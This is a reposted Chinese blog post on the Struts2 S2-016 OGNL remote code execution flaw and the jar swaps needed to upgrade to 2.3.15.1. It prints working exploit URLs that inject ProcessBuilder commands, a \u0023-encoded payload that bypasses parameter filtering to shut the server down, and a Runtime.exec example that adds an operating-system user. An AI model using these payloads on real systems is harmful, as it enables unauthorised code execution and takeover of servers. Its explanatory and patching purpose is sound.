升级struts2.3.15之前漏洞

最新推荐文章于 2021-04-20 15:58:08 发布

weixin_34148340

最新推荐文章于 2021-04-20 15:58:08 发布

阅读量123

点赞数

文章标签： java runtime python

原文链接：https://my.oschina.net/u/205650/blog/161531

版权

2019独角兽企业重金招聘Python工程师标准>>>

Struts又爆远程代码执行漏洞！在这次的漏洞中，攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本，参数action的值redirect以及redirectAction没有正确过滤，导致ognl代码执行。

漏洞证明

参数会以OGNL表达式执行

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代码执行

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

漏洞原理

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

1、原理

Struts2的核心是使用的webwork框架，处理 action时通过调用底层的getter/setter方法来处理http的参数，它将每个http参数声明为一个ONGL（这里是ONGL的介绍）语句。当我们提交一个http参数：

?user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL将它转换为：
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")

这是通过ParametersInterceptor（参数过滤器）来执行的，使用用户提供的HTTP参数调用 ValueStack.setValue()。 www.2cto.com

为了防范篡改服务器端对象，XWork的ParametersInterceptor不允许参数名中出现“#”字符，但如果使用了Java的 unicode字符串表示\u0023，攻击者就可以绕过保护，修改保护Java方式执行的值：

此处代码有破坏性，请在测试环境执行，严禁用此种方法进行恶意攻击
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
转义后是这样：

?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

OGNL处理时最终的结果就是

java.lang.Runtime.getRuntime().exit(1); //关闭程序，即将web程序关闭

类似的可以执行
java.lang.Runtime.getRuntime().exec("net user 用户名密码 /add");//增加操作系统用户，在有权限的情况下能成功（在URL中用%20替换空格，%2F替换/）
只要有权限就可以执行任何DOS命令。

Struts升级2.3.15.1

官方地址：http://struts.apache.org/release/2.3.x/docs/s2-016.html

原来是struts2.1.18升级的时候直接替换jar报错，需要注意

commons-lang3-3.1.jar (保留commons-lang-2.4.jar)

javassist-3.11.0.GA.jar(新加）

ognl-3.0.6.jar(替换)

struts2-core-2.3.15.1.jar(替换)

xwork-core-2.3.15.1.jar(替换)

转载于:https://my.oschina.net/u/205650/blog/161531